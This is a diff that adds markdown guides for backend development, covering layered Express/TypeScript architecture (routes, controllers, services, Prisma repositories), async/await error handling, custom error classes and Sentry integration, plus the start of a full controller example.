@@ -0,0 +1,451 @@
|
|||||||
|
# Architecture Overview - Backend Services
|
||||||
|
|
||||||
|
Complete guide to the layered architecture pattern used in backend microservices.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Layered Architecture Pattern](#layered-architecture-pattern)
|
||||||
|
- [Request Lifecycle](#request-lifecycle)
|
||||||
|
- [Service Comparison](#service-comparison)
|
||||||
|
- [Directory Structure Rationale](#directory-structure-rationale)
|
||||||
|
- [Module Organization](#module-organization)
|
||||||
|
- [Separation of Concerns](#separation-of-concerns)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Layered Architecture Pattern
|
||||||
|
|
||||||
|
### The Four Layers
|
||||||
|
|
||||||
|
```
|
||||||
|
┌─────────────────────────────────────┐
|
||||||
|
│ HTTP Request │
|
||||||
|
└───────────────┬─────────────────────┘
|
||||||
|
↓
|
||||||
|
┌─────────────────────────────────────┐
|
||||||
|
│ Layer 1: ROUTES │
|
||||||
|
│ - Route definitions only │
|
||||||
|
│ - Middleware registration │
|
||||||
|
│ - Delegate to controllers │
|
||||||
|
│ - NO business logic │
|
||||||
|
└───────────────┬─────────────────────┘
|
||||||
|
↓
|
||||||
|
┌─────────────────────────────────────┐
|
||||||
|
│ Layer 2: CONTROLLERS │
|
||||||
|
│ - Request/response handling │
|
||||||
|
│ - Input validation │
|
||||||
|
│ - Call services │
|
||||||
|
│ - Format responses │
|
||||||
|
│ - Error handling │
|
||||||
|
└───────────────┬─────────────────────┘
|
||||||
|
↓
|
||||||
|
┌─────────────────────────────────────┐
|
||||||
|
│ Layer 3: SERVICES │
|
||||||
|
│ - Business logic │
|
||||||
|
│ - Orchestration │
|
||||||
|
│ - Call repositories │
|
||||||
|
│ - No HTTP knowledge │
|
||||||
|
└───────────────┬─────────────────────┘
|
||||||
|
↓
|
||||||
|
┌─────────────────────────────────────┐
|
||||||
|
│ Layer 4: REPOSITORIES │
|
||||||
|
│ - Data access abstraction │
|
||||||
|
│ - Prisma operations │
|
||||||
|
│ - Query optimization │
|
||||||
|
│ - Caching │
|
||||||
|
└───────────────┬─────────────────────┘
|
||||||
|
↓
|
||||||
|
┌─────────────────────────────────────┐
|
||||||
|
│ Database (MySQL) │
|
||||||
|
└─────────────────────────────────────┘
|
||||||
|
```
|
||||||
|
|
||||||
|
### Why This Architecture?
|
||||||
|
|
||||||
|
**Testability:**
|
||||||
|
- Each layer can be tested independently
|
||||||
|
- Easy to mock dependencies
|
||||||
|
- Clear test boundaries
|
||||||
|
|
||||||
|
**Maintainability:**
|
||||||
|
- Changes isolated to specific layers
|
||||||
|
- Business logic separate from HTTP concerns
|
||||||
|
- Easy to locate bugs
|
||||||
|
|
||||||
|
**Reusability:**
|
||||||
|
- Services can be used by routes, cron jobs, scripts
|
||||||
|
- Repositories hide database implementation
|
||||||
|
- Business logic not tied to HTTP
|
||||||
|
|
||||||
|
**Scalability:**
|
||||||
|
- Easy to add new endpoints
|
||||||
|
- Clear patterns to follow
|
||||||
|
- Consistent structure
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Request Lifecycle
|
||||||
|
|
||||||
|
### Complete Flow Example
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
1. HTTP POST /api/users
|
||||||
|
↓
|
||||||
|
2. Express matches route in userRoutes.ts
|
||||||
|
↓
|
||||||
|
3. Middleware chain executes:
|
||||||
|
- SSOMiddleware.verifyLoginStatus (authentication)
|
||||||
|
- auditMiddleware (context tracking)
|
||||||
|
↓
|
||||||
|
4. Route handler delegates to controller:
|
||||||
|
router.post('/users', (req, res) => userController.create(req, res))
|
||||||
|
↓
|
||||||
|
5. Controller validates and calls service:
|
||||||
|
- Validate input with Zod
|
||||||
|
- Call userService.create(data)
|
||||||
|
- Handle success/error
|
||||||
|
↓
|
||||||
|
6. Service executes business logic:
|
||||||
|
- Check business rules
|
||||||
|
- Call userRepository.create(data)
|
||||||
|
- Return result
|
||||||
|
↓
|
||||||
|
7. Repository performs database operation:
|
||||||
|
- PrismaService.main.user.create({ data })
|
||||||
|
- Handle database errors
|
||||||
|
- Return created user
|
||||||
|
↓
|
||||||
|
8. Response flows back:
|
||||||
|
Repository → Service → Controller → Express → Client
|
||||||
|
```
|
||||||
|
|
||||||
|
### Middleware Execution Order
|
||||||
|
|
||||||
|
**Critical:** Middleware executes in registration order
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
app.use(Sentry.Handlers.requestHandler()); // 1. Sentry tracing (FIRST)
|
||||||
|
app.use(express.json()); // 2. Body parsing
|
||||||
|
app.use(express.urlencoded({ extended: true })); // 3. URL encoding
|
||||||
|
app.use(cookieParser()); // 4. Cookie parsing
|
||||||
|
app.use(SSOMiddleware.initialize()); // 5. Auth initialization
|
||||||
|
// ... routes registered here
|
||||||
|
app.use(auditMiddleware); // 6. Audit (if global)
|
||||||
|
app.use(errorBoundary); // 7. Error handler (LAST)
|
||||||
|
app.use(Sentry.Handlers.errorHandler()); // 8. Sentry errors (LAST)
|
||||||
|
```
|
||||||
|
|
||||||
|
**Rule:** Error handlers must be registered AFTER routes!
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Service Comparison
|
||||||
|
|
||||||
|
### Email Service (Mature Pattern ✅)
|
||||||
|
|
||||||
|
**Strengths:**
|
||||||
|
- Comprehensive BaseController with Sentry integration
|
||||||
|
- Clean route delegation (no business logic in routes)
|
||||||
|
- Consistent dependency injection pattern
|
||||||
|
- Good middleware organization
|
||||||
|
- Type-safe throughout
|
||||||
|
- Excellent error handling
|
||||||
|
|
||||||
|
**Example Structure:**
|
||||||
|
```
|
||||||
|
email/src/
|
||||||
|
├── controllers/
|
||||||
|
│ ├── BaseController.ts ✅ Excellent template
|
||||||
|
│ ├── NotificationController.ts ✅ Extends BaseController
|
||||||
|
│ └── EmailController.ts ✅ Clean patterns
|
||||||
|
├── routes/
|
||||||
|
│ ├── notificationRoutes.ts ✅ Clean delegation
|
||||||
|
│ └── emailRoutes.ts ✅ No business logic
|
||||||
|
├── services/
|
||||||
|
│ ├── NotificationService.ts ✅ Dependency injection
|
||||||
|
│ └── BatchingService.ts ✅ Clear responsibility
|
||||||
|
└── middleware/
|
||||||
|
├── errorBoundary.ts ✅ Comprehensive
|
||||||
|
└── DevImpersonationSSOMiddleware.ts
|
||||||
|
```
|
||||||
|
|
||||||
|
**Use as template** for new services!
|
||||||
|
|
||||||
|
### Form Service (Transitioning ⚠️)
|
||||||
|
|
||||||
|
**Strengths:**
|
||||||
|
- Excellent workflow architecture (event sourcing)
|
||||||
|
- Good Sentry integration
|
||||||
|
- Innovative audit middleware (AsyncLocalStorage)
|
||||||
|
- Comprehensive permission system
|
||||||
|
|
||||||
|
**Weaknesses:**
|
||||||
|
- Some routes have 200+ lines of business logic
|
||||||
|
- Inconsistent controller naming
|
||||||
|
- Direct process.env usage (60+ occurrences)
|
||||||
|
- Minimal repository pattern usage
|
||||||
|
|
||||||
|
**Example:**
|
||||||
|
```
|
||||||
|
form/src/
|
||||||
|
├── routes/
|
||||||
|
│ ├── responseRoutes.ts ❌ Business logic in routes
|
||||||
|
│ └── proxyRoutes.ts ✅ Good validation pattern
|
||||||
|
├── controllers/
|
||||||
|
│ ├── formController.ts ⚠️ Lowercase naming
|
||||||
|
│ └── UserProfileController.ts ✅ PascalCase naming
|
||||||
|
├── workflow/ ✅ Excellent architecture!
|
||||||
|
│ ├── core/
|
||||||
|
│ │ ├── WorkflowEngineV3.ts ✅ Event sourcing
|
||||||
|
│ │ └── DryRunWrapper.ts ✅ Innovative
|
||||||
|
│ └── services/
|
||||||
|
└── middleware/
|
||||||
|
└── auditMiddleware.ts ✅ AsyncLocalStorage pattern
|
||||||
|
```
|
||||||
|
|
||||||
|
**Learn from:** workflow/, middleware/auditMiddleware.ts
|
||||||
|
**Avoid:** responseRoutes.ts, direct process.env
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Directory Structure Rationale
|
||||||
|
|
||||||
|
### Controllers Directory
|
||||||
|
|
||||||
|
**Purpose:** Handle HTTP request/response concerns
|
||||||
|
|
||||||
|
**Contents:**
|
||||||
|
- `BaseController.ts` - Base class with common methods
|
||||||
|
- `{Feature}Controller.ts` - Feature-specific controllers
|
||||||
|
|
||||||
|
**Naming:** PascalCase + Controller
|
||||||
|
|
||||||
|
**Responsibilities:**
|
||||||
|
- Parse request parameters
|
||||||
|
- Validate input (Zod)
|
||||||
|
- Call appropriate service methods
|
||||||
|
- Format responses
|
||||||
|
- Handle errors (via BaseController)
|
||||||
|
- Set HTTP status codes
|
||||||
|
|
||||||
|
### Services Directory
|
||||||
|
|
||||||
|
**Purpose:** Business logic and orchestration
|
||||||
|
|
||||||
|
**Contents:**
|
||||||
|
- `{feature}Service.ts` - Feature business logic
|
||||||
|
|
||||||
|
**Naming:** camelCase + Service (or PascalCase + Service)
|
||||||
|
|
||||||
|
**Responsibilities:**
|
||||||
|
- Implement business rules
|
||||||
|
- Orchestrate multiple repositories
|
||||||
|
- Transaction management
|
||||||
|
- Business validations
|
||||||
|
- No HTTP knowledge (Request/Response types)
|
||||||
|
|
||||||
|
### Repositories Directory
|
||||||
|
|
||||||
|
**Purpose:** Data access abstraction
|
||||||
|
|
||||||
|
**Contents:**
|
||||||
|
- `{Entity}Repository.ts` - Database operations for entity
|
||||||
|
|
||||||
|
**Naming:** PascalCase + Repository
|
||||||
|
|
||||||
|
**Responsibilities:**
|
||||||
|
- Prisma query operations
|
||||||
|
- Query optimization
|
||||||
|
- Database error handling
|
||||||
|
- Caching layer
|
||||||
|
- Hide Prisma implementation details
|
||||||
|
|
||||||
|
**Current Gap:** Only 1 repository exists (WorkflowRepository)
|
||||||
|
|
||||||
|
### Routes Directory
|
||||||
|
|
||||||
|
**Purpose:** Route registration ONLY
|
||||||
|
|
||||||
|
**Contents:**
|
||||||
|
- `{feature}Routes.ts` - Express router for feature
|
||||||
|
|
||||||
|
**Naming:** camelCase + Routes
|
||||||
|
|
||||||
|
**Responsibilities:**
|
||||||
|
- Register routes with Express
|
||||||
|
- Apply middleware
|
||||||
|
- Delegate to controllers
|
||||||
|
- **NO business logic!**
|
||||||
|
|
||||||
|
### Middleware Directory
|
||||||
|
|
||||||
|
**Purpose:** Cross-cutting concerns
|
||||||
|
|
||||||
|
**Contents:**
|
||||||
|
- Authentication middleware
|
||||||
|
- Audit middleware
|
||||||
|
- Error boundaries
|
||||||
|
- Validation middleware
|
||||||
|
- Custom middleware
|
||||||
|
|
||||||
|
**Naming:** camelCase
|
||||||
|
|
||||||
|
**Types:**
|
||||||
|
- Request processing (before handler)
|
||||||
|
- Response processing (after handler)
|
||||||
|
- Error handling (error boundary)
|
||||||
|
|
||||||
|
### Config Directory
|
||||||
|
|
||||||
|
**Purpose:** Configuration management
|
||||||
|
|
||||||
|
**Contents:**
|
||||||
|
- `unifiedConfig.ts` - Type-safe configuration
|
||||||
|
- Environment-specific configs
|
||||||
|
|
||||||
|
**Pattern:** Single source of truth
|
||||||
|
|
||||||
|
### Types Directory
|
||||||
|
|
||||||
|
**Purpose:** TypeScript type definitions
|
||||||
|
|
||||||
|
**Contents:**
|
||||||
|
- `{feature}.types.ts` - Feature-specific types
|
||||||
|
- DTOs (Data Transfer Objects)
|
||||||
|
- Request/Response types
|
||||||
|
- Domain models
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Module Organization
|
||||||
|
|
||||||
|
### Feature-Based Organization
|
||||||
|
|
||||||
|
For large features, use subdirectories:
|
||||||
|
|
||||||
|
```
|
||||||
|
src/workflow/
|
||||||
|
├── core/ # Core engine
|
||||||
|
├── services/ # Workflow-specific services
|
||||||
|
├── actions/ # System actions
|
||||||
|
├── models/ # Domain models
|
||||||
|
├── validators/ # Workflow validation
|
||||||
|
└── utils/ # Workflow utilities
|
||||||
|
```
|
||||||
|
|
||||||
|
**When to use:**
|
||||||
|
- Feature has 5+ files
|
||||||
|
- Clear sub-domains exist
|
||||||
|
- Logical grouping improves clarity
|
||||||
|
|
||||||
|
### Flat Organization
|
||||||
|
|
||||||
|
For simple features:
|
||||||
|
|
||||||
|
```
|
||||||
|
src/
|
||||||
|
├── controllers/UserController.ts
|
||||||
|
├── services/userService.ts
|
||||||
|
├── routes/userRoutes.ts
|
||||||
|
└── repositories/UserRepository.ts
|
||||||
|
```
|
||||||
|
|
||||||
|
**When to use:**
|
||||||
|
- Simple features (< 5 files)
|
||||||
|
- No clear sub-domains
|
||||||
|
- Flat structure is clearer
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Separation of Concerns
|
||||||
|
|
||||||
|
### What Goes Where
|
||||||
|
|
||||||
|
**Routes Layer:**
|
||||||
|
- ✅ Route definitions
|
||||||
|
- ✅ Middleware registration
|
||||||
|
- ✅ Controller delegation
|
||||||
|
- ❌ Business logic
|
||||||
|
- ❌ Database operations
|
||||||
|
- ❌ Validation logic (should be in validator or controller)
|
||||||
|
|
||||||
|
**Controllers Layer:**
|
||||||
|
- ✅ Request parsing (params, body, query)
|
||||||
|
- ✅ Input validation (Zod)
|
||||||
|
- ✅ Service calls
|
||||||
|
- ✅ Response formatting
|
||||||
|
- ✅ Error handling
|
||||||
|
- ❌ Business logic
|
||||||
|
- ❌ Database operations
|
||||||
|
|
||||||
|
**Services Layer:**
|
||||||
|
- ✅ Business logic
|
||||||
|
- ✅ Business rules enforcement
|
||||||
|
- ✅ Orchestration (multiple repos)
|
||||||
|
- ✅ Transaction management
|
||||||
|
- ❌ HTTP concerns (Request/Response)
|
||||||
|
- ❌ Direct Prisma calls (use repositories)
|
||||||
|
|
||||||
|
**Repositories Layer:**
|
||||||
|
- ✅ Prisma operations
|
||||||
|
- ✅ Query construction
|
||||||
|
- ✅ Database error handling
|
||||||
|
- ✅ Caching
|
||||||
|
- ❌ Business logic
|
||||||
|
- ❌ HTTP concerns
|
||||||
|
|
||||||
|
### Example: User Creation
|
||||||
|
|
||||||
|
**Route:**
|
||||||
|
```typescript
|
||||||
|
router.post('/users',
|
||||||
|
SSOMiddleware.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
(req, res) => userController.create(req, res)
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
**Controller:**
|
||||||
|
```typescript
|
||||||
|
async create(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const validated = createUserSchema.parse(req.body);
|
||||||
|
const user = await this.userService.create(validated);
|
||||||
|
this.handleSuccess(res, user, 'User created');
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'create');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Service:**
|
||||||
|
```typescript
|
||||||
|
async create(data: CreateUserDTO): Promise<User> {
|
||||||
|
// Business rule: check if email already exists
|
||||||
|
const existing = await this.userRepository.findByEmail(data.email);
|
||||||
|
if (existing) throw new ConflictError('Email already exists');
|
||||||
|
|
||||||
|
// Create user
|
||||||
|
return await this.userRepository.create(data);
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Repository:**
|
||||||
|
```typescript
|
||||||
|
async create(data: CreateUserDTO): Promise<User> {
|
||||||
|
return PrismaService.main.user.create({ data });
|
||||||
|
}
|
||||||
|
|
||||||
|
async findByEmail(email: string): Promise<User | null> {
|
||||||
|
return PrismaService.main.user.findUnique({ where: { email } });
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Notice:** Each layer has clear, distinct responsibilities!
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md) - Main guide
|
||||||
|
- [routing-and-controllers.md](routing-and-controllers.md) - Routes and controllers details
|
||||||
|
- [services-and-repositories.md](services-and-repositories.md) - Service and repository patterns
|
||||||
307
skills/backend-dev-guidelines/resources/async-and-errors.md
Normal file
307
skills/backend-dev-guidelines/resources/async-and-errors.md
Normal file
@@ -0,0 +1,307 @@
|
|||||||
|
# Async Patterns and Error Handling
|
||||||
|
|
||||||
|
Complete guide to async/await patterns and custom error handling.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Async/Await Best Practices](#asyncawait-best-practices)
|
||||||
|
- [Promise Error Handling](#promise-error-handling)
|
||||||
|
- [Custom Error Types](#custom-error-types)
|
||||||
|
- [asyncErrorWrapper Utility](#asyncerrorwrapper-utility)
|
||||||
|
- [Error Propagation](#error-propagation)
|
||||||
|
- [Common Async Pitfalls](#common-async-pitfalls)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Async/Await Best Practices
|
||||||
|
|
||||||
|
### Always Use Try-Catch
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ NEVER: Unhandled async errors
|
||||||
|
async function fetchData() {
|
||||||
|
const data = await database.query(); // If throws, unhandled!
|
||||||
|
return data;
|
||||||
|
}
|
||||||
|
|
||||||
|
// ✅ ALWAYS: Wrap in try-catch
|
||||||
|
async function fetchData() {
|
||||||
|
try {
|
||||||
|
const data = await database.query();
|
||||||
|
return data;
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error);
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Avoid .then() Chains
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ AVOID: Promise chains
|
||||||
|
function processData() {
|
||||||
|
return fetchData()
|
||||||
|
.then(data => transform(data))
|
||||||
|
.then(transformed => save(transformed))
|
||||||
|
.catch(error => {
|
||||||
|
console.error(error);
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// ✅ PREFER: Async/await
|
||||||
|
async function processData() {
|
||||||
|
try {
|
||||||
|
const data = await fetchData();
|
||||||
|
const transformed = await transform(data);
|
||||||
|
return await save(transformed);
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error);
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Promise Error Handling
|
||||||
|
|
||||||
|
### Parallel Operations
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ✅ Handle errors in Promise.all
|
||||||
|
try {
|
||||||
|
const [users, profiles, settings] = await Promise.all([
|
||||||
|
userService.getAll(),
|
||||||
|
profileService.getAll(),
|
||||||
|
settingsService.getAll(),
|
||||||
|
]);
|
||||||
|
} catch (error) {
|
||||||
|
// One failure fails all
|
||||||
|
Sentry.captureException(error);
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
|
||||||
|
// ✅ Handle errors individually with Promise.allSettled
|
||||||
|
const results = await Promise.allSettled([
|
||||||
|
userService.getAll(),
|
||||||
|
profileService.getAll(),
|
||||||
|
settingsService.getAll(),
|
||||||
|
]);
|
||||||
|
|
||||||
|
results.forEach((result, index) => {
|
||||||
|
if (result.status === 'rejected') {
|
||||||
|
Sentry.captureException(result.reason, {
|
||||||
|
tags: { operation: ['users', 'profiles', 'settings'][index] }
|
||||||
|
});
|
||||||
|
}
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Custom Error Types
|
||||||
|
|
||||||
|
### Define Custom Errors
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Base error class
|
||||||
|
export class AppError extends Error {
|
||||||
|
constructor(
|
||||||
|
message: string,
|
||||||
|
public code: string,
|
||||||
|
public statusCode: number,
|
||||||
|
public isOperational: boolean = true
|
||||||
|
) {
|
||||||
|
super(message);
|
||||||
|
this.name = this.constructor.name;
|
||||||
|
Error.captureStackTrace(this, this.constructor);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Specific error types
|
||||||
|
export class ValidationError extends AppError {
|
||||||
|
constructor(message: string) {
|
||||||
|
super(message, 'VALIDATION_ERROR', 400);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
export class NotFoundError extends AppError {
|
||||||
|
constructor(message: string) {
|
||||||
|
super(message, 'NOT_FOUND', 404);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
export class ForbiddenError extends AppError {
|
||||||
|
constructor(message: string) {
|
||||||
|
super(message, 'FORBIDDEN', 403);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
export class ConflictError extends AppError {
|
||||||
|
constructor(message: string) {
|
||||||
|
super(message, 'CONFLICT', 409);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Usage
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Throw specific errors
|
||||||
|
if (!user) {
|
||||||
|
throw new NotFoundError('User not found');
|
||||||
|
}
|
||||||
|
|
||||||
|
if (user.age < 18) {
|
||||||
|
throw new ValidationError('User must be 18+');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Error boundary handles them
|
||||||
|
function errorBoundary(error, req, res, next) {
|
||||||
|
if (error instanceof AppError) {
|
||||||
|
return res.status(error.statusCode).json({
|
||||||
|
error: {
|
||||||
|
message: error.message,
|
||||||
|
code: error.code
|
||||||
|
}
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// Unknown error
|
||||||
|
Sentry.captureException(error);
|
||||||
|
res.status(500).json({ error: { message: 'Internal server error' } });
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## asyncErrorWrapper Utility
|
||||||
|
|
||||||
|
### Pattern
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
export function asyncErrorWrapper(
|
||||||
|
handler: (req: Request, res: Response, next: NextFunction) => Promise<any>
|
||||||
|
) {
|
||||||
|
return async (req: Request, res: Response, next: NextFunction) => {
|
||||||
|
try {
|
||||||
|
await handler(req, res, next);
|
||||||
|
} catch (error) {
|
||||||
|
next(error);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Usage
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Without wrapper - error can be unhandled
|
||||||
|
router.get('/users', async (req, res) => {
|
||||||
|
const users = await userService.getAll(); // If throws, unhandled!
|
||||||
|
res.json(users);
|
||||||
|
});
|
||||||
|
|
||||||
|
// With wrapper - errors caught
|
||||||
|
router.get('/users', asyncErrorWrapper(async (req, res) => {
|
||||||
|
const users = await userService.getAll();
|
||||||
|
res.json(users);
|
||||||
|
}));
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Error Propagation
|
||||||
|
|
||||||
|
### Proper Error Chains
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ✅ Propagate errors up the stack
|
||||||
|
async function repositoryMethod() {
|
||||||
|
try {
|
||||||
|
return await PrismaService.main.user.findMany();
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error, { tags: { layer: 'repository' } });
|
||||||
|
throw error; // Propagate to service
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async function serviceMethod() {
|
||||||
|
try {
|
||||||
|
return await repositoryMethod();
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error, { tags: { layer: 'service' } });
|
||||||
|
throw error; // Propagate to controller
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async function controllerMethod(req, res) {
|
||||||
|
try {
|
||||||
|
const result = await serviceMethod();
|
||||||
|
res.json(result);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'controllerMethod'); // Final handler
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Common Async Pitfalls
|
||||||
|
|
||||||
|
### Fire and Forget (Bad)
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ NEVER: Fire and forget
|
||||||
|
async function processRequest(req, res) {
|
||||||
|
sendEmail(user.email); // Fires async, errors unhandled!
|
||||||
|
res.json({ success: true });
|
||||||
|
}
|
||||||
|
|
||||||
|
// ✅ ALWAYS: Await or handle
|
||||||
|
async function processRequest(req, res) {
|
||||||
|
try {
|
||||||
|
await sendEmail(user.email);
|
||||||
|
res.json({ success: true });
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error);
|
||||||
|
res.status(500).json({ error: 'Failed to send email' });
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ✅ OR: Intentional background task
|
||||||
|
async function processRequest(req, res) {
|
||||||
|
sendEmail(user.email).catch(error => {
|
||||||
|
Sentry.captureException(error);
|
||||||
|
});
|
||||||
|
res.json({ success: true });
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Unhandled Rejections
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ✅ Global handler for unhandled rejections
|
||||||
|
process.on('unhandledRejection', (reason, promise) => {
|
||||||
|
Sentry.captureException(reason, {
|
||||||
|
tags: { type: 'unhandled_rejection' }
|
||||||
|
});
|
||||||
|
console.error('Unhandled Rejection:', reason);
|
||||||
|
});
|
||||||
|
|
||||||
|
process.on('uncaughtException', (error) => {
|
||||||
|
Sentry.captureException(error, {
|
||||||
|
tags: { type: 'uncaught_exception' }
|
||||||
|
});
|
||||||
|
console.error('Uncaught Exception:', error);
|
||||||
|
process.exit(1);
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md)
|
||||||
|
- [sentry-and-monitoring.md](sentry-and-monitoring.md)
|
||||||
|
- [complete-examples.md](complete-examples.md)
|
||||||
638
skills/backend-dev-guidelines/resources/complete-examples.md
Normal file
638
skills/backend-dev-guidelines/resources/complete-examples.md
Normal file
@@ -0,0 +1,638 @@
|
|||||||
|
# Complete Examples - Full Working Code
|
||||||
|
|
||||||
|
Real-world examples showing complete implementation patterns.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Complete Controller Example](#complete-controller-example)
|
||||||
|
- [Complete Service with DI](#complete-service-with-di)
|
||||||
|
- [Complete Route File](#complete-route-file)
|
||||||
|
- [Complete Repository](#complete-repository)
|
||||||
|
- [Refactoring Example: Bad to Good](#refactoring-example-bad-to-good)
|
||||||
|
- [End-to-End Feature Example](#end-to-end-feature-example)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Complete Controller Example
|
||||||
|
|
||||||
|
### UserController (Following All Best Practices)
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// controllers/UserController.ts
|
||||||
|
import { Request, Response } from 'express';
|
||||||
|
import { BaseController } from './BaseController';
|
||||||
|
import { UserService } from '../services/userService';
|
||||||
|
import { createUserSchema, updateUserSchema } from '../validators/userSchemas';
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
export class UserController extends BaseController {
|
||||||
|
private userService: UserService;
|
||||||
|
|
||||||
|
constructor() {
|
||||||
|
super();
|
||||||
|
this.userService = new UserService();
|
||||||
|
}
|
||||||
|
|
||||||
|
async getUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
this.addBreadcrumb('Fetching user', 'user_controller', {
|
||||||
|
userId: req.params.id,
|
||||||
|
});
|
||||||
|
|
||||||
|
const user = await this.withTransaction(
|
||||||
|
'user.get',
|
||||||
|
'db.query',
|
||||||
|
() => this.userService.findById(req.params.id)
|
||||||
|
);
|
||||||
|
|
||||||
|
if (!user) {
|
||||||
|
return this.handleError(
|
||||||
|
new Error('User not found'),
|
||||||
|
res,
|
||||||
|
'getUser',
|
||||||
|
404
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
this.handleSuccess(res, user);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'getUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async listUsers(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const users = await this.userService.getAll();
|
||||||
|
this.handleSuccess(res, users);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'listUsers');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async createUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
// Validate input with Zod
|
||||||
|
const validated = createUserSchema.parse(req.body);
|
||||||
|
|
||||||
|
// Track performance
|
||||||
|
const user = await this.withTransaction(
|
||||||
|
'user.create',
|
||||||
|
'db.mutation',
|
||||||
|
() => this.userService.create(validated)
|
||||||
|
);
|
||||||
|
|
||||||
|
this.handleSuccess(res, user, 'User created successfully', 201);
|
||||||
|
} catch (error) {
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
return this.handleError(error, res, 'createUser', 400);
|
||||||
|
}
|
||||||
|
this.handleError(error, res, 'createUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async updateUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const validated = updateUserSchema.parse(req.body);
|
||||||
|
|
||||||
|
const user = await this.userService.update(
|
||||||
|
req.params.id,
|
||||||
|
validated
|
||||||
|
);
|
||||||
|
|
||||||
|
this.handleSuccess(res, user, 'User updated');
|
||||||
|
} catch (error) {
|
||||||
|
if (error instanceof z.ZodError) {
|
||||||
|
return this.handleError(error, res, 'updateUser', 400);
|
||||||
|
}
|
||||||
|
this.handleError(error, res, 'updateUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async deleteUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
await this.userService.delete(req.params.id);
|
||||||
|
